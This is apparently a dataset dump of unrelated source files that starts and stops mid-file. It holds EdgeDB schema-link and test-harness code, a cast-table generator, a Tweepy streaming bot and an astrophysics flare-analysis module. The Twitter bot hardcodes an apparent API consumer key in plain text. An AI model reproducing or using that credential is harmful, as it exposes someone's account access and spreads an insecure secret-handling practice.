if cmd.get_attribute_value('default') is not None:
raise errors.SchemaDefinitionError(
f"'default' is not a valid field for an abstract link",
context=astnode.context)
assert isinstance(cmd, sd.Command)
return cmd
def get_ast_attr_for_field(
self,
field: str,
astnode: Type[qlast.DDLOperation],
) -> Optional[str]:
if (
field == 'required'
and issubclass(astnode, qlast.CreateConcreteLink)
):
return 'is_required'
elif (
field == 'cardinality'
and issubclass(astnode, qlast.CreateConcreteLink)
):
return 'cardinality'
else:
return super().get_ast_attr_for_field(field, astnode)
def _apply_field_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
node: qlast.DDLOperation,
op: sd.AlterObjectProperty,
) -> None:
objtype = self.get_referrer_context(context)
if op.property == 'target' and objtype:
# Due to how SDL is processed the underlying AST may be an
# AlterConcreteLink, which requires different handling.
if isinstance(node, qlast.CreateConcreteLink):
if not node.target:
expr = self.get_attribute_value('expr')
if expr is not None:
node.target = expr.qlast
else:
t = op.new_value
assert isinstance(t, (so.Object, so.ObjectShell))
node.target = utils.typeref_to_ast(schema, t)
else:
assert isinstance(op.new_value, (so.Object, so.ObjectShell))
node.commands.append(
qlast.SetPointerType(
value=utils.typeref_to_ast(schema, op.new_value),
)
)
elif op.property == 'on_target_delete':
node.commands.append(qlast.OnTargetDelete(cascade=op.new_value))
else:
super()._apply_field_ast(schema, context, node, op)
def inherit_classref_dict(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
) -> sd.CommandGroup:
if self.scls.get_computable(schema) and refdict.attr != 'pointers':
# If the link is a computable, the inheritance would only
# happen in the case of aliasing, and in that case we only
# need to inherit the link properties and nothing else.
return sd.CommandGroup()
cmd = super().inherit_classref_dict(schema, context, refdict)
if refdict.attr != 'pointers':
return cmd
parent_ctx = self.get_referrer_context(context)
if parent_ctx is None:
return cmd
base_prop_name = sn.QualName('std', 'source')
s_name = sn.get_specialized_name(
sn.QualName('__', 'source'), str(self.classname))
src_prop_name = sn.QualName(
name=s_name, module=self.classname.module)
src_prop = properties.CreateProperty(
classname=src_prop_name,
is_strong_ref=True,
)
src_prop.set_attribute_value('name', src_prop_name)
src_prop.set_attribute_value(
'bases',
so.ObjectList.create(schema, [schema.get(base_prop_name)]),
)
src_prop.set_attribute_value(
'source',
self.scls,
)
src_prop.set_attribute_value(
'target',
parent_ctx.op.scls,
)
src_prop.set_attribute_value('required', True)
src_prop.set_attribute_value('readonly', True)
src_prop.set_attribute_value('final', True)
src_prop.set_attribute_value('owned', True)
src_prop.set_attribute_value('from_alias',
self.scls.get_from_alias(schema))
src_prop.set_attribute_value('cardinality',
qltypes.SchemaCardinality.One)
cmd.prepend(src_prop)
base_prop_name = sn.QualName('std', 'target')
s_name = sn.get_specialized_name(
sn.QualName('__', 'target'), str(self.classname))
tgt_prop_name = sn.QualName(
name=s_name, module=self.classname.module)
tgt_prop = properties.CreateProperty(
classname=tgt_prop_name,
is_strong_ref=True,
)
tgt_prop.set_attribute_value('name', tgt_prop_name)
tgt_prop.set_attribute_value(
'bases',
so.ObjectList.create(schema, [schema.get(base_prop_name)]),
)
tgt_prop.set_attribute_value(
'source',
self.scls,
)
tgt_prop.set_attribute_value(
'target',
self.get_attribute_value('target'),
)
tgt_prop.set_attribute_value('required', False)
tgt_prop.set_attribute_value('readonly', True)
tgt_prop.set_attribute_value('final', True)
tgt_prop.set_attribute_value('owned', True)
tgt_prop.set_attribute_value('from_alias',
self.scls.get_from_alias(schema))
tgt_prop.set_attribute_value('cardinality',
qltypes.SchemaCardinality.One)
cmd.prepend(tgt_prop)
return cmd
class RenameLink(
LinkCommand,
referencing.RenameReferencedInheritingObject[Link],
):
pass
class RebaseLink(
LinkCommand,
referencing.RebaseReferencedInheritingObject[Link],
):
pass
class SetLinkType(
pointers.SetPointerType[Link],
referrer_context_class=LinkSourceCommandContext,
field='target',
):
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
schema = super()._alter_begin(schema, context)
scls = self.scls
new_target = scls.get_target(schema)
if not context.canonical:
# We need to update the target link prop as well
tgt_prop = scls.getptr(schema, sn.UnqualName('target'))
tgt_prop_alter = tgt_prop.init_delta_command(
schema, sd.AlterObject)
tgt_prop_alter.set_attribute_value('target', new_target)
self.add(tgt_prop_alter)
return schema
class AlterLinkUpperCardinality(
pointers.AlterPointerUpperCardinality[Link],
referrer_context_class=LinkSourceCommandContext,
field='cardinality',
):
pass
class AlterLinkLowerCardinality(
pointers.AlterPointerLowerCardinality[Link],
referrer_context_class=LinkSourceCommandContext,
field='required',
):
pass
class AlterLinkOwned(
referencing.AlterOwned[Link],
pointers.PointerCommandOrFragment[Link],
referrer_context_class=LinkSourceCommandContext,
field='owned',
):
pass
class SetTargetDeletePolicy(sd.Command):
astnode = qlast.OnTargetDelete
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.AlterObjectProperty:
return sd.AlterObjectProperty(
property='on_target_delete'
)
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
assert isinstance(astnode, qlast.OnTargetDelete)
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(cmd, sd.AlterObjectProperty)
cmd.new_value = astnode.cascade
return cmd
class AlterLink(
LinkCommand,
pointers.AlterPointer[Link],
):
astnode = [qlast.AlterConcreteLink, qlast.AlterLink]
referenced_astnode = qlast.AlterConcreteLink
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterLink:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(cmd, AlterLink)
if isinstance(astnode, qlast.CreateConcreteLink):
cmd._process_create_or_alter_ast(schema, astnode, context)
else:
cmd._process_alter_ast(schema, astnode, context)
return cmd
def _apply_field_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
node: qlast.DDLOperation,
op: sd.AlterObjectProperty,
) -> None:
if op.property == 'target':
if op.new_value:
assert isinstance(op.new_value, so.ObjectShell)
node.commands.append(
qlast.SetPointerType(
value=utils.typeref_to_ast(schema, op.new_value),
),
)
elif op.property == 'computable':
if not op.new_value:
node.commands.append(
qlast.SetField(
name='expr',
value=None,
special_syntax=True,
),
)
elif op.property == 'on_target_delete':
node.commands.append(qlast.OnTargetDelete(cascade=op.new_value))
else:
super()._apply_field_ast(schema, context, node, op)
class DeleteLink(
LinkCommand,
pointers.DeletePointer[Link],
):
astnode = [qlast.DropConcreteLink, qlast.DropLink]
referenced_astnode = qlast.DropConcreteLink
# NB: target type cleanup (e.g. target compound type) is done by
# the DeleteProperty handler for the @target property.
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
if self.get_orig_attribute_value('from_alias'):
# This is an alias type, appropriate DDL would be generated
# from the corresponding Alter/DeleteAlias node.
return None
else:
return super()._get_ast(schema, context, parent_node=parent_node)
```
#### File: edb/testbase/lang.py
```python
from __future__ import annotations
from typing import *
import typing
import functools
import os
import re
import unittest
from edb.common import context
from edb.common import debug
from edb.common import devmode
from edb.common import markup
from edb import errors
from edb import edgeql
from edb.edgeql import ast as qlast
from edb.edgeql import parser as qlparser
from edb.server import buildmeta
from edb.server import defines
from edb.server import compiler as edbcompiler
from edb.schema import ddl as s_ddl
from edb.schema import delta as sd
from edb.schema import migrations as s_migrations # noqa
from edb.schema import reflection as s_refl
from edb.schema import schema as s_schema
from edb.schema import std as s_std
from edb.schema import utils as s_utils
def must_fail(exc_type, exc_msg_re=None, **kwargs):
"""A decorator to ensure that the test fails with a specific exception.
If exc_msg_re is passed, assertRaisesRegex will be used to match the
exception message.
Example:
@must_fail(EdgeQLSyntaxError,
'non-default argument follows', line=2, col=61)
def test_edgeql_syntax_1(self):
...
"""
def wrap(func):
args = (exc_type,)
if exc_msg_re is not None:
args += (exc_msg_re,)
_set_spec(func, 'must_fail', (args, kwargs))
return func
return wrap
def _set_spec(func, name, attrs):
try:
spec = func.test_spec
except AttributeError:
spec = func.test_spec = {}
assert name not in spec
spec[name] = attrs
class DocTestMeta(type(unittest.TestCase)):
def __new__(mcls, name, bases, dct):
for attr, meth in tuple(dct.items()):
if attr.startswith('test_') and meth.__doc__:
@functools.wraps(meth)
def wrapper(self, meth=meth, doc=meth.__doc__):
spec = getattr(meth, 'test_spec', {})
spec['test_name'] = meth.__name__
if doc:
output = error = None
source, _, output = doc.partition('\n% OK %')
if not output:
source, _, error = doc.partition('\n% ERROR %')
if not error:
output = None
else:
output = error
else:
source = output = None
self._run_test(source=source, spec=spec, expected=output)
dct[attr] = wrapper
return super().__new__(mcls, name, bases, dct)
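# Illustrative sketch (hypothetical test, not part of this module): a
# docstring-driven test picked up by DocTestMeta.  The wrapper above splits
# the docstring on '\n% OK %' (or '\n% ERROR %'); the first part is the
# source handed to _run_test(), the remainder is the expected output.
#
#     class TestExampleSyntax(BaseSyntaxTest):
#         def test_example_select_01(self):
#             """
#             SELECT 1;
#             % OK %
#             SELECT 1;
#             """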
class BaseDocTest(unittest.TestCase, metaclass=DocTestMeta):
parser_debug_flag = ''
re_filter: Optional[typing.Pattern[str]] = None
def _run_test(self, *, source, spec=None, expected=None):
if spec and 'must_fail' in spec:
spec_args, spec_kwargs = spec['must_fail']
if len(spec_args) == 1:
assertRaises = self.assertRaises
else:
assertRaises = self.assertRaisesRegex
with assertRaises(*spec_args) as cm:
return self.run_test(source=source, spec=spec,
expected=expected)
if cm.exception:
exc = cm.exception
for attr_name, expected_val in spec_kwargs.items():
val = getattr(exc, attr_name)
if val != expected_val:
raise AssertionError(
f'must_fail: attribute {attr_name!r} is '
f'{val} (expected is {expected_val!r})') from exc
else:
return self.run_test(source=source, spec=spec, expected=expected)
def run_test(self, *, source, spec, expected=None):
raise NotImplementedError
def assert_equal(
self,
expected,
result,
*,
re_filter: Optional[str] = None,
message: Optional[str] = None
) -> None:
if re_filter is None:
re_filter = self.re_filter
if re_filter is not None:
expected_stripped = re_filter.sub('', expected).lower()
result_stripped = re_filter.sub('', result).lower()
else:
expected_stripped = expected.lower()
result_stripped = result.lower()
self.assertEqual(
expected_stripped,
result_stripped,
(f'{message if message else ""}' +
f'\nexpected:\n{expected}\nreturned:\n{result}')
)
class BaseSyntaxTest(BaseDocTest):
ast_to_source: Optional[Any] = None
markup_dump_lexer: Optional[str] = None
def get_parser(self, *, spec):
raise NotImplementedError
def run_test(self, *, source, spec, expected=None):
debug = bool(os.environ.get(self.parser_debug_flag))
if debug:
markup.dump_code(source, lexer=self.markup_dump_lexer)
p = self.get_parser(spec=spec)
inast = p.parse(source)
if debug:
markup.dump(inast)
# make sure that the AST has context
#
context.ContextValidator().visit(inast)
processed_src = self.ast_to_source(inast)
if debug:
markup.dump_code(processed_src, lexer=self.markup_dump_lexer)
expected_src = source if expected is None else expected
self.assert_equal(expected_src, processed_src)
class AstValueTest(BaseDocTest):
def run_test(self, *, source, spec=None, expected=None):
debug = bool(os.environ.get(self.parser_debug_flag))
if debug:
markup.dump_code(source, lexer=self.markup_dump_lexer)
p = self.get_parser(spec=spec)
inast = p.parse(source)
if debug:
markup.dump(inast)
for var in inast.definitions[0].variables:
asttype, val = expected[var.name]
self.assertIsInstance(var.value, asttype)
self.assertEqual(var.value.value, val)
_std_schema = None
_refl_schema = None
_schema_class_layout = None
def _load_std_schema():
global _std_schema
if _std_schema is None:
std_dirs_hash = buildmeta.hash_dirs(s_std.CACHE_SRC_DIRS)
schema = None
if devmode.is_in_dev_mode():
schema = buildmeta.read_data_cache(
std_dirs_hash, 'transient-stdschema.pickle')
if schema is None:
schema = s_schema.FlatSchema()
for modname in s_schema.STD_SOURCES:
schema = s_std.load_std_module(schema, modname)
schema, _ = s_std.make_schema_version(schema)
schema, _ = s_std.make_global_schema_version(schema)
if devmode.is_in_dev_mode():
buildmeta.write_data_cache(
schema, std_dirs_hash, 'transient-stdschema.pickle')
_std_schema = schema
return _std_schema
def _load_reflection_schema():
global _refl_schema
global _schema_class_layout
if _refl_schema is None:
std_dirs_hash = buildmeta.hash_dirs(s_std.CACHE_SRC_DIRS)
cache = None
if devmode.is_in_dev_mode():
cache = buildmeta.read_data_cache(
std_dirs_hash, 'transient-reflschema.pickle')
if cache is not None:
reflschema, classlayout = cache
else:
std_schema = _load_std_schema()
reflection = s_refl.generate_structure(std_schema)
classlayout = reflection.class_layout
context = sd.CommandContext()
context.stdmode = True
reflschema = reflection.intro_schema_delta.apply(
std_schema, context)
if devmode.is_in_dev_mode():
buildmeta.write_data_cache(
(reflschema, classlayout),
std_dirs_hash,
'transient-reflschema.pickle',
)
_refl_schema = reflschema
_schema_class_layout = classlayout
return _refl_schema, _schema_class_layout
def new_compiler():
std_schema = _load_std_schema()
refl_schema, layout = _load_reflection_schema()
return edbcompiler.new_compiler(
std_schema=std_schema,
reflection_schema=refl_schema,
schema_class_layout=layout,
)
class BaseSchemaTest(BaseDocTest):
DEFAULT_MODULE = 'default'
SCHEMA: Optional[str] = None
schema: s_schema.Schema
@classmethod
def setUpClass(cls):
script = cls.get_schema_script()
if script is not None:
cls.schema = cls.run_ddl(_load_std_schema(), script)
else:
cls.schema = _load_std_schema()
@classmethod
def run_ddl(cls, schema, ddl, default_module=defines.DEFAULT_MODULE_ALIAS):
statements = edgeql.parse_block(ddl)
current_schema = schema
target_schema = None
migration_schema = None
migration_target = None
migration_script = []
for stmt in statements:
if isinstance(stmt, qlast.StartMigration):
# START MIGRATION
if target_schema is None:
target_schema = _load_std_schema()
migration_target = s_ddl.apply_sdl(
stmt.target,
base_schema=target_schema,
current_schema=current_schema,
testmode=True,
)
migration_schema = current_schema
ddl_plan = None
elif isinstance(stmt, qlast.PopulateMigration):
# POPULATE MIGRATION
if migration_target is None:
raise errors.QueryError(
'unexpected POPULATE MIGRATION:'
' not currently in a migration block',
context=stmt.context,
)
migration_diff = s_ddl.delta_schemas(
migration_schema,
migration_target,
)
if debug.flags.delta_plan:
debug.header('Populate Migration Diff')
debug.dump(migration_diff, schema=schema)
new_ddl = s_ddl.ddlast_from_delta(
migration_schema,
migration_target,
migration_diff,
)
migration_script.extend(new_ddl)
if debug.flags.delta_plan:
debug.header('Populate Migration DDL AST')
text = []
for cmd in new_ddl:
debug.dump(cmd)
text.append(edgeql.generate_source(cmd, pretty=True))
debug.header('Populate Migration DDL Text')
debug.dump_code(';\n'.join(text) + ';')
elif isinstance(stmt, qlast.CommitMigration):
if migration_target is None:
raise errors.QueryError(
'unexpected COMMIT MIGRATION:'
' not currently in a migration block',
context=stmt.context,
)
last_migration = current_schema.get_last_migration()
if last_migration:
last_migration_ref = s_utils.name_to_ast_ref(
last_migration.get_name(current_schema),
)
else:
last_migration_ref = None
create_migration = qlast.CreateMigration(
body=qlast.NestedQLBlock(commands=migration_script),
parent=last_migration_ref,
)
ddl_plan = s_ddl.delta_from_ddl(
create_migration,
schema=migration_schema,
modaliases={None: default_module},
testmode=True,
)
if debug.flags.delta_plan:
debug.header('Delta Plan')
debug.dump(ddl_plan, schema=schema)
migration_schema = None
migration_target = None
migration_script = []
elif isinstance(stmt, qlast.DDL):
if migration_target is not None:
migration_script.append(stmt)
ddl_plan = None
else:
ddl_plan = s_ddl.delta_from_ddl(
stmt,
schema=current_schema,
modaliases={None: default_module},
testmode=True,
)
if debug.flags.delta_plan:
debug.header('Delta Plan')
debug.dump(ddl_plan, schema=schema)
else:
raise ValueError(
f'unexpected {stmt!r} in compiler setup script')
if ddl_plan is not None:
context = sd.CommandContext()
context.testmode = True
current_schema = ddl_plan.apply(current_schema, context)
return current_schema
@classmethod
def load_schema(
cls, source: str, modname: Optional[str]=None) -> s_schema.Schema:
if not modname:
modname = cls.DEFAULT_MODULE
sdl_schema = qlparser.parse_sdl(f'module {modname} {{ {source} }}')
schema = _load_std_schema()
return s_ddl.apply_sdl(
sdl_schema,
base_schema=schema,
current_schema=schema,
)
@classmethod
def get_schema_script(cls):
script = ''
# look at all SCHEMA entries and potentially create multiple modules
schema = []
for name, val in cls.__dict__.items():
m = re.match(r'^SCHEMA(?:_(\w+))?', name)
if m:
module_name = (m.group(1)
or 'default').lower().replace('__', '.')
if '\n' in val:
# Inline schema source
module = val
else:
with open(val, 'r') as sf:
module = sf.read()
schema.append(f'\nmodule {module_name} {{ {module} }}')
if schema:
script += f'\nSTART MIGRATION'
script += f' TO {{ {"".join(schema)} }};'
script += f'\nPOPULATE MIGRATION;'
script += f'\nCOMMIT MIGRATION;'
return script.strip(' \n')
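# Note added for clarity (not in the original file): the regex above lets a
# subclass declare several schema modules via class attributes -- SCHEMA maps
# to the 'default' module, SCHEMA_FOO to a module named 'foo', and a double
# underscore becomes a dot (SCHEMA_STD__MATH -> module 'std.math').  A value
# containing a newline is treated as inline schema source; otherwise it is
# read as a path to a schema file.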
class BaseSchemaLoadTest(BaseSchemaTest):
def run_test(self, *, source, spec, expected=None):
self.load_schema(source)
class BaseEdgeQLCompilerTest(BaseSchemaTest):
@classmethod
def get_schema_script(cls):
script = super().get_schema_script()
if not script:
raise ValueError(
'compiler test cases must define at least one '
'schema in the SCHEMA[_MODNAME] class attribute.')
return script
```
#### File: edb/tools/gen_cast_table.py
```python
from __future__ import annotations
import sys
from edb.tools.edb import edbcommands
from edb.server import defines as edgedb_defines
import edgedb
# Hardcode the scalar types (and the order of their appearance in
# the table), because it's hard to group them otherwise.
SCALARS = [
'std::json',
'std::str',
'std::float32',
'std::float64',
'std::int16',
'std::int32',
'std::int64',
'std::bigint',
'std::decimal',
'std::bool',
'std::bytes',
'std::uuid',
'std::datetime',
'std::duration',
'cal::local_date',
'cal::local_datetime',
'cal::local_time',
]
SCALAR_SET = set(SCALARS)
def die(msg):
print(f'FATAL: {msg}', file=sys.stderr)
sys.exit(1)
def get_casts_to_type(target, impl_cast):
results = []
for source in SCALARS:
cast = (source, target)
if impl_cast.get(cast):
results.append(cast)
return results
def is_reachable(source, target, impl_cast):
if source == target:
return True
casts = get_casts_to_type(target, impl_cast)
if not casts:
return False
sources = {c[0] for c in casts}
if source in sources:
return True
else:
reachable = any(is_reachable(source, s, impl_cast) for s in sources)
if reachable:
impl_cast[(source, target)] = True
return reachable
def get_all_casts(con):
# Read the casts.
casts = con.query('''
WITH MODULE schema
SELECT Cast {
source := .from_type.name,
target := .to_type.name,
allow_assignment,
allow_implicit,
}
FILTER .from_type IS ScalarType AND .to_type IS ScalarType
''')
# Calculate the explicit, assignment, and implicit cast tables.
expl_cast = {}
assn_cast = {}
impl_cast = {}
for cast in casts:
source = cast.source
target = cast.target
if source in SCALAR_SET and target in SCALAR_SET:
expl_cast[(source, target)] = True
if cast.allow_assignment:
assn_cast[(source, target)] = True
if cast.allow_implicit:
assn_cast[(source, target)] = True
impl_cast[(source, target)] = True
# Implicit cast table needs to be recursively expanded from the
# starting casts.
for source in SCALARS:
for target in SCALARS:
is_reachable(source, target, impl_cast)
return (expl_cast, assn_cast, impl_cast)
def main(con):
expl_cast, assn_cast, impl_cast = get_all_casts(con)
# Top row with all the scalars listed
code = []
line = ['from \\\\ to']
for target in SCALARS:
line.append(f':eql:type:`{target.split("::")[1]} <{target}>`')
code.append(','.join(line))
for source in SCALARS:
line = [f':eql:type:`{source.split("::")[1]} <{source}>`']
for target in SCALARS:
val = ''
if impl_cast.get((source, target)):
val = 'impl'
elif assn_cast.get((source, target)):
val = '``:=``'
elif expl_cast.get((source, target)):
val = '``<>``'
line.append(val)
code.append(','.join(line))
code = '\n'.join(code) + '\n'
print(code, end='')
@edbcommands.command('gen-cast-table')
def gen_cast_table():
"""Generate a table of scalar casts to be used in the documentation.
NAME - at the moment there's only one option 'edgeql'
"""
con = None
try:
con = edgedb.connect(user=edgedb_defines.EDGEDB_SUPERUSER,
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
port=5656)
main(con)
except Exception as ex:
die(str(ex))
finally:
if con is not None:
con.close()
``` |
{
"source": "jrach190/mangohacks2016",
"score": 3
} |
#### File: jrach190/mangohacks2016/twitter_bot.py
```python
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
ckey = 'U9Tafmmex2480HX7rk0WBlxVz'
csecret = '<KEY>'
atoken = '<KEY>'
asecret = '<KEY>'
class listener(StreamListener):
def on_data(self, data):
saveFile = open('twitDb.csv','a')
saveFile.write(data)
saveFile.write('\n')
saveFile.close()
tweet = data.split(',"text":"')[1]
tweet = tweet.split('","source":"')[0]
# time = data.split  # NOTE: dead code in the original -- this assigned the bound
# method without calling it, and the value was never used
print (tweet)
return True
def on_error(self, status):
print (status)
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
twitterStream = Stream(auth, listener())
twitterStream.filter(track=["cat"])
``` |
{
"source": "jradavenport/appaloosa",
"score": 3
} |
#### File: appaloosa/appaloosa/analysis.py
```python
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib.colors import LogNorm
import matplotlib
import os
import sys
import appaloosa
import pandas as pd
import datetime
import warnings
from scipy.optimize import curve_fit, minimize
from astropy.stats import funcs
import emcee
import corner
# from scipy.stats import binned_statistic_2d
# from os.path import expanduser
matplotlib.rcParams.update({'font.size':18})
matplotlib.rcParams.update({'font.family':'serif'})
def _ABmag2flux(mag, zeropt=48.60,
wave0=6400.0, fwhm=4000.0):
'''
Replicate the IDL procedure:
http://idlastro.gsfc.nasa.gov/ftp/pro/astro/mag2flux.pro
flux = 10**(-0.4*(mag +2.406 + 4*np.log10(wave0)))
Parameters set for Kepler band specifically
e.g. see http://stev.oapd.inaf.it/~lgirardi/cmd_2.7/photsys.html
'''
c = 2.99792458e18 # speed of light, in [A/s]
# standard equation from Oke & Gunn (1983)
# has units: [erg/s/cm2/Hz]
f_nu = 10.0 ** ( (mag + zeropt) / (-2.5) )
# has units of [erg/s/cm2/A]
f_lambda = f_nu * c / (wave0**2.0)
# Finally: units of [erg/s/cm2]
flux = f_lambda * fwhm
# now all we'll need downstream is the distance to get L [erg/s]
return flux
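# Usage sketch (added; not part of the original module): with the default
# Kepler-band zero point and bandpass, an AB magnitude of 0 corresponds to
# f_nu ~ 3.6e-20 erg/s/cm^2/Hz and a band-integrated flux of ~1.1e-5 erg/s/cm^2:
# _ABmag2flux(0.0) # ~ 1.1e-5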
def _tau(mass):
'''
Write up the Eqn 11 from Wright (2011) that gives the
convective turnover timescale, used in Rossby number calculation
(Ro = Prot / tau)
Parameters
----------
mass : float
relative to solar
Returns
-------
tau (in days)
'''
log_tau = 1.16 - 1.49 * np.log10(mass) - 0.54 * np.log10(mass)**2.
return 10.**log_tau
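# Sanity check (added): for a 1 Msun star the relation above gives log_tau = 1.16,
# i.e. tau ~ 14.5 days, so a star with Prot = 25 d has Ro = Prot / tau ~ 1.7:
# _tau(1.0) # ~ 14.5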
def RoFlare(r,a,b,s):
'''
The piecewise function that has a saturated and decaying regime
Parameters
----------
r : the log Ro value
a : the amplitude
b : the break Ro
s : the slope
Returns
-------
'''
f = np.piecewise(r, [(r <= b), (r > b)],
[a, # before the break, it is flat
lambda x: (s * (x-b) + a)])
return f
def _Perror(n, full=False, down=False):
'''
Calculate the asymmetric Poisson error, using Eqn 7
and Eqn 12 in Gehrels 1986, ApJ, 303, 336
Parameters
----------
n
full
Returns
-------
'''
err_up = err_dn = np.sqrt(n + 0.75) + 1.0 # this is the default behavior for N=0
xn = np.where((n > 0))[0]
if np.size(xn) > 0:
err_dn[xn] = np.abs(n[xn] * (1.-1./(9. * n[xn])-1./(3.*np.sqrt(n[xn])))**3.-n[xn])
err_up[xn] = n[xn] + np.sqrt(n[xn] + 0.75) + 1.0 - n[xn]
# else:
# err_up = np.sqrt(n + 0.75) + 1.0
# err_dn = err_up
# # err_up = err_dn = np.nan
if full is True:
return err_dn, err_up
else:
if down is True:
return err_dn
else:
return err_up
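# Example (added): with zero detected events the default branch applies and both
# the upper and lower errors are sqrt(0.75) + 1 ~ 1.87:
# _Perror(np.array([0]), full=True) # ~ (array([1.87]), array([1.87]))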
def _DistModulus(m_app, M_abs):
'''
Trivial wrapper to invert the classic equation:
m - M = 5 log(d) - 5
Parameters
----------
m_app
apparent magnitude
M_abs
absolute magnitude
Returns
-------
distance, in pc
'''
mu = m_app - M_abs
dist = 10.0**(mu/5.0 + 1.0)
return dist
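# Example (added): an apparent magnitude of 10 and an absolute magnitude of 5
# give a distance modulus of 5, i.e. a distance of 100 pc:
# _DistModulus(10.0, 5.0) # -> 100.0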
def _linfunc(x, m, b):
'''
A simple linear function to fit with curve_fit
'''
return m * x + b
def _plaw(x, m, b):
'''
a powerlaw function
'''
x2 = 10.**x
return b * (x2**m)
def Angus2015(B_V, age):
'''
Compute the rotation period expected for a star of a given color (temp) and age
NOTE: - input Age is in Myr
- output Period is in days
Eqn 15 from Angus+2015
http://adsabs.harvard.edu/abs/2015MNRAS.450.1787A
'''
P = (age ** 0.55) * 0.4 * ((B_V - 0.45) ** 0.31)
return P
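# Sanity check (added): for roughly solar values, B-V ~ 0.65 and age ~ 4570 Myr,
# the relation returns ~25 days, close to the solar rotation period:
# Angus2015(0.65, 4570.) # ~ 25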
def Angus2015_age(B_V, P):
'''
Invert the gyrochronology relation: compute the age of a star given its color (temp) and rotation period
NOTE: - output Age is in Myr
- input Period is in days
Eqn 15 from Angus+2015
http://adsabs.harvard.edu/abs/2015MNRAS.450.1787A
'''
# P = (age ** 0.55) * 0.4 * ((B_V - 0.45) ** 0.31)
age = np.power(P / (0.4 * ((B_V - 0.45) ** 0.31)), 1. / 0.55)
return age
def MH2008(B_V, age):
'''
Equations 12,13,14 from Mamajek & Hillenbrand (2008)
http://adsabs.harvard.edu/abs/2008ApJ...687.1264M
Coefficients from Table 10
Parameters
----------
B_V (B-V) color
age in Myr
Returns
-------
rotation period, in days
'''
a = 0.407
b = 0.325
c = 0.495
n = 0.566
f = a * np.power(B_V - c, b)
g = np.power(age, n)
P = f * g
return P
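# Sanity check (added): the same solar-like inputs (B-V ~ 0.65, age ~ 4570 Myr)
# give ~26 days here, broadly consistent with the Angus+2015 relation above:
# MH2008(0.65, 4570.) # ~ 26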
def MH2008_age(B_V, P):
'''
Inverse of MH2008: given (B-V) color and rotation period P (in days), return age in Myr.
'''
a = 0.407
b = 0.325
c = 0.495
n = 0.566
f = a * np.power(B_V - c, b)
# g = np.power(age, n)
# P = f * g
age = np.power(P / f, 1. / n)
return age
def getBV(mass, isochrone='1.0gyr.dat'):
try:
__file__
except NameError:
__file__ = os.getenv("HOME") + '/python/appaloosa/appaloosa/analysis.py'
dir = os.path.dirname(os.path.realpath(__file__)) + '/../misc/'
file = dir + isochrone
df = pd.read_table(file, delim_whitespace=True, comment='#',
names=('Z', 'log_age', 'M_ini', 'M_act', 'logL/Lo', 'logTe', 'logG',
'mbol', 'Kepler', 'g', 'r', 'i', 'z', 'DDO51_finf','int_IMF',
'stage', 'J', 'H', 'Ks', 'U', 'B', 'V', 'R', 'I'))
mass_iso = df['M_ini'].values
ss = np.argsort(mass_iso) # needs to be sorted for interpolation
BV_iso = df['B'].values - df['V'].values
BV = np.interp((mass), mass_iso[ss], BV_iso[ss])
return BV
def FlareEqn0(X, a1, a2, b1, b2):
'''
this is the simple FFD evolution for bins of mass,
i.e. only produce FFD model as a function of energy and age (drop mass dependence)
run on each of the (g-i) sample bins shown in paper
Parameters
----------
X = (logE, logt)
age in log Myr
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt = X
a = a1 * logt + a2
b = b1 * logt + b2
logR = logE * a + b
return logR
def FlareEqn(X, a1, a2, a3, b1, b2, b3):
'''
The big FFD fitting equation, fitting both the powerlaw slope and intercept as functions of mass and age
THIS is the original version from Paper2 draft v1
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = a1 * logt + a2 * m + a3
b = b1 * logt + b2 * m + b3
logR = logE * a + b
return logR
def FlareEqnNew(X, a1, a2, a3, b1, b2, b3):
'''
The big FFD fitting equation, fitting ONLY the powerlaw intercept as a function of mass and age
The powerlaw slope is fixed to a=-1
warning: currently requires a1,a2,a3 for backwards compatibility with the "FlareEqn" function above...
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = -1.
b = b1 * logt + b2 * m + b3
logR = logE * a + b
return logR
def flare_lnprob(p, x, y, yerr):
N = np.size(x)
model = FlareEqn(x, *p)
return -0.5 * appaloosa.chisq(y, yerr, model)
def FlareEqn_nolog(X, a1, a2, a3, b1, b2, b3):
'''
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
Rate of flares (NOTE: not the log rate)
'''
logE, logt, m = X
a = a1 * logt + a2 * m + a3
b = b1 * logt + b2 * m + b3
logR = logE * a + b
return 10.0 ** logR
def FlareEqn2(X, a1, a2, a3, a4, a5, a6, b1, b2):
'''
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = (a1 * logt) + (a2 * m) + (a3 * logt * m) + (a4 * logt**2) + (a5 * m**2) + a6
b = b1 * m + b2
logR = logE * a + b
return logR
def FlareEqn2_nolog(X, a1, a2, a3, a4, a5, a6, b1, b2):
'''
Parameters
----------
X = (logE, logt, m)
age in log Myr
mass in Solar
E in log erg
Returns
-------
log Rate of flares
'''
logE, logt, m = X
a = (a1 * logt) + (a2 * m) + (a3 * logt * m) + (a4 * logt**2) + (a5 * m**2) + a6
b = b1 * m + b2
logR = logE * a + b
